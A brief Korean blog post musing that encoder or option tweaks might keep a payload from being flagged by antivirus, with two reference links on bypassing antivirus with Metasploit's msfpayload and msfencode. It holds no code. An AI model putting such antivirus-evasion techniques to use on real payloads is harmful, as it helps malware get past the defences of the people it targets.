좀 더 공부해봐야 알겠지만 인코더나 옵션 조정하면 백신에 탐지 안되게 할 수도 있지 않을까요? 흠...



우회 관련된 참고할만한 자료

Using msfpayload and msfencode from Metasploit 3.3 to bypass anti-virus
http://www.irongeek.com/i.php?page=videos/msfpayload-msfencoder-metasploit-3-3

0x02 안티바이러스 피해가기
http://linux-virus.springnote.com/pages/4330985?print=1




Posted by demantos